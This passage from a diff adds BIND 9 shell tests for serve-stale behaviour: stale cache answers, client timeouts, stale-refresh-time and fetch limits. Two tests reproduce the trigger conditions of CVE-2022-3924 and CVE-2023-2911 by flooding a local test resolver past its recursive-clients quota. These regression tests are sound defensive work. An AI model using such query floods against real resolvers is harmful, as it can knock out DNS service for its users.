dig.out.test$n +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "TXT.\"0\"" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Allow RRset to become stale. +sleep 2 + +nextpart ns3/named.run > /dev/null + +echo_i "sending queries for tests $((n+1))-$((n+3))..." +t1=`$PERL -e 'print time()'` +$DIG -p ${PORT} +tries=1 +timeout=10 @10.53.0.3 data.example TXT > dig.out.test$((n+1)) & +$DIG -p ${PORT} +tries=1 +timeout=10 @10.53.0.3 nodata.example TXT > dig.out.test$((n+2)) +$DIG -p ${PORT} +tries=1 +timeout=10 @10.53.0.3 data.slow TXT > dig.out.test$((n+3)) & +wait +t2=`$PERL -e 'print time()'` + +# We configured a long value of 30 seconds for resolver-query-timeout. +# That should give us enough time to receive an stale answer from cache +# after stale-answer-client-timeout timer of 1.8 sec triggers. +n=$((n+1)) +echo_i "check stale data.example TXT comes from cache (stale-answer-client-timeout 1.8) ($n)" +ret=0 +wait_for_log 5 "data.example client timeout, stale answer used" ns3/named.run || ret=1 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "data\.example\..*3.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1 +# Configured stale-answer-client-timeout is 1.8s, we allow some extra time +# just in case other tests are taking too much cpu. +[ $((t2 - t1)) -le 10 ] || { echo_i "query took $((t2 - t1))s to resolve."; ret=1; } +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check stale nodata.example TXT comes from cache (stale-answer-client-timeout 1.8) ($n)" +ret=0 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +grep "example\..*3.*IN.*SOA" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check stale data.slow TXT comes from cache (stale-answer-client-timeout 1.8) ($n)" +ret=0 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "data\.slow\..*3.*IN.*TXT.*A slow text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Now query for RRset not in cache. The first query should time out, but once +# we enable the authoritative server, the second query should be able to get a +# response. + +nextpart ns3/named.run > /dev/null + +echo_i "sending queries for tests $((n+2))-$((n+4))..." +$DIG -p ${PORT} +tries=1 +timeout=3 @10.53.0.3 longttl.example TXT > dig.out.test$((n+2)) & +$DIG -p ${PORT} +tries=1 +timeout=10 @10.53.0.3 longttl.example TXT > dig.out.test$((n+3)) & +$DIG -p ${PORT} +tries=1 +timeout=3 @10.53.0.3 longttl.example RRSIG > dig.out.test$((n+4)) & + +# Enable the authoritative name server after stale-answer-client-timeout. +n=$((n+1)) +echo_i "enable responses from authoritative server ($n)" +ret=0 +sleep 4 +$DIG -p ${PORT} @10.53.0.2 txt enable > dig.out.test$n +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "TXT.\"1\"" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check not in cache longttl.example TXT times out (stale-answer-client-timeout 1.8) ($n)" +ret=0 +wait_for_log 4 "longttl.example client timeout, stale answer unavailable" ns3/named.run || ret=1 +check_results() { + [ -s "$1" ] || return 1 + grep "connection timed out" "$1" > /dev/null || return 1 + return 0 +} +retry_quiet 4 check_results dig.out.test$n || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check not in cache longttl.example TXT comes from authoritative (stale-answer-client-timeout 1.8) ($n)" +ret=0 +check_results() { + [ -s "$1" ] || return 1 + grep "status: NOERROR" "$1" > /dev/null || return 1 + grep "ANSWER: 1," "$1" > /dev/null || return 1 + return 0 +} +retry_quiet 8 check_results dig.out.test$n || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check not in cache longttl.example RRSIG times out (stale-answer-client-timeout 1.8) ($n)" +ret=0 +check_results() { + [ -s "$1" ] || return 1 + grep "connection timed out" "$1" > /dev/null || return 1 + return 0 +} +retry_quiet 8 check_results dig.out.test$n || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# CVE-2022-3924, GL #3619 +n=$((n+1)) +echo_i "check that named survives reaching recursive-clients quota (stale-answer-client-timeout 1.8) ($n)" +ret=0 +num=0 +# Make sure to exceed the configured value of 'recursive-clients 10;' by running +# 20 parallel queries with simulated network latency. +while [ $num -lt 20 ]; do + $DIG +tries=1 -p ${PORT} @10.53.0.3 "latency${num}.data.example" TXT >/dev/null 2>&1 & + num=$((num+1)) +done; +check_server_responds() { + $DIG -p ${PORT} @10.53.0.3 version.bind txt ch >dig.out.test$n || return 1 + grep "status: NOERROR" dig.out.test$n > /dev/null || return 1 +} +retry_quiet 5 check_server_responds || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +############################################# +# Test for stale-answer-client-timeout off. # +############################################# +echo_i "test stale-answer-client-timeout (off)" + +n=$((n+1)) +echo_i "updating ns3/named.conf ($n)" +ret=0 +copy_setports ns3/named3.conf.in ns3/named.conf +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "running 'rndc reload' ($n)" +ret=0 +rndc_reload ns3 10.53.0.3 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Send a query, auth server is disabled, we will enable it after a while in +# order to receive an answer before resolver-query-timeout expires. Since +# stale-answer-client-timeout is disabled we must receive an answer from +# authoritative server. +echo_i "sending query for test $((n+2))" +$DIG -p ${PORT} @10.53.0.3 data.example TXT > dig.out.test$((n+2)) & +sleep 3 + +n=$((n+1)) +echo_i "enable responses from authoritative server ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.2 txt enable > dig.out.test$n +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "TXT.\"1\"" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Wait until dig is done. +wait + +n=$((n+1)) +echo_i "check data.example TXT comes from authoritative server (stale-answer-client-timeout off) ($n)" +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "data\.example\..*[12].*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +############################################################## +# Test for stale-answer-client-timeout off and CNAME record. # +############################################################## +echo_i "test stale-answer-client-timeout (0) and CNAME record" + +n=$((n+1)) +echo_i "prime cache shortttl.cname.example (stale-answer-client-timeout off) ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.3 shortttl.cname.example A > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 2," dig.out.test$n > /dev/null || ret=1 +grep "shortttl\.cname\.example\..*1.*IN.*CNAME.*longttl\.target\.example\." dig.out.test$n > /dev/null || ret=1 +grep "longttl\.target\.example\..*600.*IN.*A.*10\.53\.0\.2" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Allow RRset to become stale. +sleep 1 + +n=$((n+1)) +echo_i "disable responses from authoritative server ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.2 txt disable > dig.out.test$n +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "TXT.\"0\"" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +ret=0 +echo_i "check stale shortttl.cname.example comes from cache (stale-answer-client-timeout off) ($n)" +nextpart ns3/named.run > /dev/null +$DIG -p ${PORT} @10.53.0.3 shortttl.cname.example A > dig.out.test$n +wait_for_log 5 "shortttl.cname.example resolver failure, stale answer used" ns3/named.run || ret=1 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 2," dig.out.test$n > /dev/null || ret=1 +grep "shortttl\.cname\.example\..*3.*IN.*CNAME.*longttl\.target\.example\." dig.out.test$n > /dev/null || ret=1 +# We can't reliably test the TTL of the longttl.target.example A record. +grep "longttl\.target\.example\..*IN.*A.*10\.53\.0\.2" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "enable responses from authoritative server ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.2 txt enable > dig.out.test$n +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "TXT.\"1\"" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check server is alive or restart ($n)" +ret=0 +$RNDCCMD 10.53.0.3 status > rndc.out.test$n 2>&1 || ret=1 +if [ $ret != 0 ]; then + echo_i "failed" + echo_i "restart ns3" + start_server --noclean --restart --port ${PORT} serve-stale ns3 +fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check server is alive or restart ($n)" +ret=0 +$RNDCCMD 10.53.0.3 status > rndc.out.test$n 2>&1 || ret=1 +if [ $ret != 0 ]; then + echo_i "failed" + echo_i "restart ns3" + start_server --noclean --restart --port ${PORT} serve-stale ns3 +fi +status=$((status+ret)) + +############################################# +# Test for stale-answer-client-timeout 0. # +############################################# +echo_i "test stale-answer-client-timeout (0)" + +n=$((n+1)) +echo_i "updating ns3/named.conf ($n)" +ret=0 +copy_setports ns3/named4.conf.in ns3/named.conf +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "restart ns3" +stop_server --use-rndc --port ${CONTROLPORT} ns3 +start_server --noclean --restart --port ${PORT} ns3 + +n=$((n+1)) +echo_i "prime cache data.example TXT (stale-answer-client-timeout 0)" +ret=0 +$DIG -p ${PORT} @10.53.0.3 data.example TXT > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "prime cache nodata.example TXT (stale-answer-client-timeout 0)" +ret=0 +$DIG -p ${PORT} @10.53.0.3 nodata.example TXT > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "disable responses from authoritative server ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.2 txt disable > dig.out.test$n +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "TXT.\"0\"" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Allow RRset to become stale. +sleep 2 + +n=$((n+1)) +ret=0 +echo_i "check stale nodata.example TXT comes from cache (stale-answer-client-timeout 0) ($n)" +nextpart ns3/named.run > /dev/null +$DIG -p ${PORT} @10.53.0.3 nodata.example TXT > dig.out.test$n +wait_for_log 5 "nodata.example stale answer used, an attempt to refresh the RRset" ns3/named.run || ret=1 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +grep "example\..*3.*IN.*SOA" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +ret=0 +echo_i "check stale data.example TXT comes from cache (stale-answer-client-timeout 0) ($n)" +nextpart ns3/named.run > /dev/null +$DIG -p ${PORT} @10.53.0.3 data.example TXT > dig.out.test$n +wait_for_log 5 "data.example stale answer used, an attempt to refresh the RRset" ns3/named.run || ret=1 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "data\.example\..*3.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "enable responses from authoritative server ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.2 txt enable > dig.out.test$n +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "TXT.\"1\"" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +wait_for_rrset_refresh() { + $DIG -p ${PORT} @10.53.0.3 data.example TXT > dig.out.test$n + grep "status: NOERROR" dig.out.test$n > /dev/null || return 1 + grep "ANSWER: 1," dig.out.test$n > /dev/null || return 1 + grep "data\.example\..*[12].*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || return 1 +} + +# This test ensures that after we get stale data due to +# stale-answer-client-timeout 0, enabling the authoritative server will allow +# the RRset to be updated. +n=$((n+1)) +ret=0 +echo_i "check stale data.example TXT was refreshed (stale-answer-client-timeout 0) ($n)" +retry_quiet 10 wait_for_rrset_refresh || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +wait_for_nodata_refresh() { + $DIG -p ${PORT} @10.53.0.3 nodata.example TXT > dig.out.test$n + grep "status: NOERROR" dig.out.test$n > /dev/null || return 1 + grep "ANSWER: 0," dig.out.test$n > /dev/null || return 1 + grep "example\..*[12].*IN.*SOA" dig.out.test$n > /dev/null || return 1 + return 0 +} + +n=$((n+1)) +ret=0 +echo_i "check stale nodata.example TXT was refreshed (stale-answer-client-timeout 0) ($n)" +retry_quiet 10 wait_for_nodata_refresh || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +#################################################################### +# Test for stale-answer-client-timeout 0 and recursive-clients 10. # +# CVE-2023-2911, GL #4089 # +# ################################################################## +echo_i "test stale-answer-client-timeout (0) and recursive-clients 10" + +n=$((n+1)) +echo_i "prime cache data.slow TXT (stale-answer-client-timeout 0) ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.3 data.slow TXT > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Run the following check twice. Sometimes a priming query interrupts the first +# attempt to exceed the quota. +attempt=0 +while [ $ret -eq 0 ] && [ $attempt -lt 2 ]; do + n=$((n+1)) + echo_i "slow down response from authoritative server ($n)" + ret=0 + $DIG -p ${PORT} @10.53.0.2 slowdown TXT > dig.out.test$n + grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 + grep "TXT.\"1\"" dig.out.test$n > /dev/null || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + # Let the data.slow TTL expire + sleep 2 + + n=$((n+1)) + echo_i "check that named survives reaching recursive-clients quota (stale-answer-client-timeout 0) ($n)" + ret=0 + num=0 + # Attempt to exceed the configured value of 'recursive-clients 10;' by running + # 20 parallel queries for the stale domain which has slow auth. + while [ $num -lt 20 ]; do + $DIG +tries=1 +timeout=10 -p ${PORT} @10.53.0.3 data.slow TXT >/dev/null 2>&1 & + num=$((num+1)) + done; + # Let the dig processes finish. + wait + retry_quiet 5 check_server_responds || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + attempt=$((attempt+1)) +done + +# Restart ns3 to avoid the exceeded recursive-clients limit from previous check +# to interfere with subsequent checks. +echo_i "restart ns3" +stop_server --use-rndc --port ${CONTROLPORT} ns3 +start_server --noclean --restart --port ${PORT} ns3 + +############################################################ +# Test for stale-answer-client-timeout 0 and CNAME record. # +############################################################ +echo_i "test stale-answer-client-timeout (0) and CNAME record" + +n=$((n+1)) +echo_i "prime cache cname1.stale.test A (stale-answer-client-timeout 0) ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.3 cname1.stale.test A > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 2," dig.out.test$n > /dev/null || ret=1 +grep "cname1\.stale\.test\..*1.*IN.*CNAME.*a1\.stale\.test\." dig.out.test$n > /dev/null || ret=1 +grep "a1\.stale\.test\..*1.*IN.*A.*192\.0\.2\.1" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Allow RRset to become stale. +sleep 1 + +n=$((n+1)) +ret=0 +echo_i "check stale cname1.stale.test A comes from cache (stale-answer-client-timeout 0) ($n)" +nextpart ns3/named.run > /dev/null +$DIG -p ${PORT} @10.53.0.3 cname1.stale.test A > dig.out.test$n +wait_for_log 5 "cname1.stale.test stale answer used, an attempt to refresh the RRset" ns3/named.run || ret=1 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 2," dig.out.test$n > /dev/null || ret=1 +grep "cname1\.stale\.test\..*3.*IN.*CNAME.*a1\.stale\.test\." dig.out.test$n > /dev/null || ret=1 +grep "a1\.stale\.test\..*3.*IN.*A.*192\.0\.2\.1" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check server is alive or restart ($n)" +ret=0 +$RNDCCMD 10.53.0.3 status > rndc.out.test$n 2>&1 || ret=1 +if [ $ret != 0 ]; then + echo_i "failed" + echo_i "restart ns3" + start_server --noclean --restart --port ${PORT} ns3 +fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "prime cache cname2.stale.test A (stale-answer-client-timeout 0) ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.3 cname2.stale.test A > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 2," dig.out.test$n > /dev/null || ret=1 +grep "cname2\.stale\.test\..*1.*IN.*CNAME.*a2\.stale\.test\." dig.out.test$n > /dev/null || ret=1 +grep "a2\.stale\.test\..*300.*IN.*A.*192\.0\.2\.2" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Allow CNAME record in the RRSET to become stale. +sleep 1 + +n=$((n+1)) +ret=0 +echo_i "check stale cname2.stale.test A comes from cache (stale-answer-client-timeout 0) ($n)" +nextpart ns3/named.run > /dev/null +$DIG -p ${PORT} @10.53.0.3 cname2.stale.test A > dig.out.test$n +wait_for_log 5 "cname2.stale.test stale answer used, an attempt to refresh the RRset" ns3/named.run || ret=1 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 2," dig.out.test$n > /dev/null || ret=1 +grep "cname2\.stale\.test\..*3.*IN.*CNAME.*a2\.stale\.test\." dig.out.test$n > /dev/null || ret=1 +# We can't reliably test the TTL of the a2.stale.test A record. +grep "a2\.stale\.test\..*IN.*A.*192\.0\.2\.2" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check server is alive or restart ($n)" +ret=0 +$RNDCCMD 10.53.0.3 status > rndc.out.test$n 2>&1 || ret=1 +if [ $ret != 0 ]; then + echo_i "failed" + echo_i "restart ns3" + start_server --noclean --restart --port ${PORT} ns3 +fi +status=$((status+ret)) + +#################################################################### +# Test for stale-answer-client-timeout 0 and stale-refresh-time 4. # +#################################################################### +echo_i "test stale-answer-client-timeout (0) and stale-refresh-time (4)" + +n=$((n+1)) +echo_i "updating ns3/named.conf ($n)" +ret=0 +copy_setports ns3/named5.conf.in ns3/named.conf +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "running 'rndc reload' ($n)" +ret=0 +rndc_reload ns3 10.53.0.3 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "flush cache, enable responses from authoritative server ($n)" +ret=0 +$RNDCCMD 10.53.0.3 flushtree example > rndc.out.test$n.1 2>&1 || ret=1 +$DIG -p ${PORT} @10.53.0.2 txt enable > dig.out.test$n +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "TXT.\"1\"" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "prime cache data.example TXT (stale-answer-client-timeout 0, stale-refresh-time 4) ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.3 data.example TXT > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "data\.example\..*2.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Allow RRset to become stale. +sleep 2 + +n=$((n+1)) +echo_i "disable responses from authoritative server ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.2 txt disable > dig.out.test$n +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "TXT.\"0\"" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +ret=0 +echo_i "check stale data.example TXT comes from cache (stale-answer-client-timeout 0 stale-refresh-time 4) ($n)" +nextpart ns3/named.run > /dev/null +$DIG -p ${PORT} @10.53.0.3 data.example TXT > dig.out.test$n +wait_for_log 5 "data.example stale answer used, an attempt to refresh the RRset" ns3/named.run || ret=1 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "data\.example\..*3.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "enable responses from authoritative server ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.2 txt enable > dig.out.test$n +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "TXT.\"1\"" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# This test ensures that after we get stale data due to +# stale-answer-client-timeout 0, enabling the authoritative server will allow +# the RRset to be updated. +n=$((n+1)) +ret=0 +echo_i "check stale data.example TXT was refreshed (stale-answer-client-timeout 0 stale-refresh-time 4) ($n)" +retry_quiet 10 wait_for_rrset_refresh || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Allow RRset to become stale. +sleep 2 + +n=$((n+1)) +echo_i "disable responses from authoritative server ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.2 txt disable > dig.out.test$n +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "TXT.\"0\"" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +ret=0 +echo_i "check stale data.example TXT comes from cache (stale-answer-client-timeout 0 stale-refresh-time 4) ($n)" +nextpart ns3/named.run > /dev/null +$DIG -p ${PORT} @10.53.0.3 data.example TXT > dig.out.test$n +wait_for_log 5 "data.example stale answer used, an attempt to refresh the RRset" ns3/named.run || ret=1 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "data\.example\..*3.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Allow stale-refresh-time to be activated. +n=$((n+1)) +ret=0 +echo_i "wait until resolver query times out, activating stale-refresh-time" +wait_for_log 15 "data.example resolver failure, stale answer used" ns3/named.run || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +ret=0 +echo_i "check stale data.example TXT comes from cache within stale-refresh-time (stale-answer-client-timeout 0 stale-refresh-time 4) ($n)" +nextpart ns3/named.run > /dev/null +$DIG -p ${PORT} @10.53.0.3 data.example TXT > dig.out.test$n +wait_for_log 5 "data.example query within stale refresh time" ns3/named.run || ret=1 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "data\.example\..*3.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "enable responses from authoritative server ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.2 txt enable > dig.out.test$n +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "TXT.\"1\"" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# We give BIND some time to ensure that after we enable authoritative server, +# this RRset is still not refreshed because it was hit during +# stale-refresh-time window. +sleep 1 + +n=$((n+1)) +ret=0 +echo_i "check stale data.example TXT was not refreshed (stale-answer-client-timeout 0 stale-refresh-time 4) ($n)" +nextpart ns3/named.run > /dev/null +$DIG -p ${PORT} @10.53.0.3 data.example TXT > dig.out.test$n +wait_for_log 5 "data.example query within stale refresh time" ns3/named.run || ret=1 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "data\.example\..*3.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# After the refresh-time-window, the RRset will be refreshed. +sleep 4 + +n=$((n+1)) +ret=0 +echo_i "check stale data.example TXT comes from cache (stale-answer-client-timeout 0 stale-refresh-time 4) ($n)" +$DIG -p ${PORT} @10.53.0.3 data.example TXT > dig.out.test$n +wait_for_log 5 "data.example stale answer used, an attempt to refresh the RRset" ns3/named.run || ret=1 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "data\.example\..*3.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +ret=0 +echo_i "check stale data.example TXT was refreshed (stale-answer-client-timeout 0 stale-refresh-time 4) ($n)" +$DIG -p ${PORT} @10.53.0.3 data.example TXT > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "data\.example\..*[12].*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +#################################################################### +# Test serve-stale's interaction with fetch limits (cache only) # +################################################################# +echo_i "test serve-stale's interaction with fetch-limits (cache only)" + +# We update the named configuration to enable fetch-limits. The fetch-limits +# are set to 1, which is ridiciously low, but that is because for this test we +# want to reach the fetch-limits. +n=$((n+1)) +echo_i "updating ns3/named.conf ($n)" +ret=0 +copy_setports ns3/named6.conf.in ns3/named.conf +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "running 'rndc reload' ($n)" +ret=0 +rndc_reload ns3 10.53.0.3 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Disable responses from authoritative server. If we can't resolve the example +# zone, fetch limits will be reached. +n=$((n+1)) +echo_i "disable responses from authoritative server ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.2 txt disable > dig.out.test$n +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "TXT.\"0\"" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Allow RRset to become stale. +sleep 2 + +# Turn on serve-stale. +n=$((n+1)) +echo_i "running 'rndc serve-stale on' ($n)" +ret=0 +$RNDCCMD 10.53.0.3 serve-stale on || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check 'rndc serve-stale status' ($n)" +ret=0 +$RNDCCMD 10.53.0.3 serve-stale status > rndc.out.test$n 2>&1 || ret=1 +grep '_default: on (rndc) (stale-answer-ttl=3 max-stale-ttl=3600 stale-refresh-time=4)' rndc.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Hit the fetch-limits. We burst the name server with a small batch of queries. +# Only 2 queries are required to hit the fetch-limits. The first query will +# start to resolve, the second one hit the fetch-limits. +burst() { + num=${1} + rm -f burst.input.$$ + while [ $num -gt 0 ]; do + num=`expr $num - 1` + echo "fetch${num}.example A" >> burst.input.$$ + done + $PERL ../ditch.pl -p ${PORT} -s 10.53.0.3 burst.input.$$ + rm -f burst.input.$$ +} + +wait_for_fetchlimits() { + burst 2 + # We expect a query for nx.example to fail because fetch-limits for + # the domain 'example.' (and everything below) has been reached. + $DIG -p ${PORT} +tries=1 +timeout=1 